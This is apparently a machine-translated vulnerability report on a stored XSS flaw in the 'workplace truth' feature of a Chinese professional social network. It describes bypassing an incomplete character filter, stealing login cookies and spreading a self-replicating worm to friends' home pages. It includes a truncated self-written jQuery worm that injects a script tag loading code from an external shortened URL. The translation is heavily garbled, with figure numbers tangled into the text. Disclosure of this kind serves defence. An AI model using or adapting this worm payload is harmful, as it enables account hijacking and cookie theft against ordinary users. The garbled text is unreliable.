A function of street network stores XSS and sends worms to the home page and other locations to obtain user logon cookies.

Previously sentStreet network is not a vulnerability on your official websiteI sent a gift and also called to express my gratitude (I started to write a wrong phone number and hit someone else, sadly. Then I went to turn around and found another one, which is much more harmful than the previous one. Messages are displayed in many locations. messages are pushed to friends in multiple ways, and are randomly displayed on the homepage and homepage of the main street network. Attackers can exploit this vulnerability to steal cookies! Street network workplace truth function exists xss, can steal accounts, worms and so on. Here, ", <,> is filtered, but the filter is not thorough. You can bypass it as long as the original tag is closed. 1st street network workplace truth function exists xss, ", <,> no filtering, it is constructed casually, and the position is in the src of the illustration. (Because the length is limited and the domain name of the image is determined, some images cannot be loaded after code is inserted here) the malicious code constructed in Figure 1 2. Figure 2 3 stolen cookies. Figure 3 4 obtain a cookie and verify the successful logon. Figure 4 5 it also needs to be noted that the picture of the workplace's truth will be displayed on the homepage of the street network and on the homepage of the workplace truth section, in addition, it will be pushed to friends in the form of new things and Short Messages (you can see new things on the homepage of the website after you log on directly), so the harm is quite large. 6. The following is a demo of the worm. 7. defect location Figure 1 8: Log On With account 1, capture packets, modify post data, and insert malicious code. Because the second picture is pushed and displayed by a friend, no changes are made. After writing it, use charles to submit a malicious question message containing worms. Figure 2 9 switch to account 2 to log on. You can see that through this code, the messages that friends account 2 sees are directly displayed on the home page, and there is no difference at all. Figure 3 10: click in, and you will find the trick. Use F12 to see that the Code is not filtered (copied to the txt file ). Figure 4 11 can be a trumpet 2 a worm-like question message has been sent to account 1 without knowing it. Figure 5 12 log on to the system with the account number 1, which is perfectly displayed as shown above. Figure 6


13 below is a simple piece of Self-written worm code (since post data has no encryption parameters and the website uses jq, it is easy to write) function test () {jQuery. post ("http://ox.dajie.com/question.do? M = ask ", {" ajax ":" 1 "," sexual ":" 0 "," portraiturl ": "> <script src = // url.cn/BY3LeX> </script>  Solution:

Filter special characters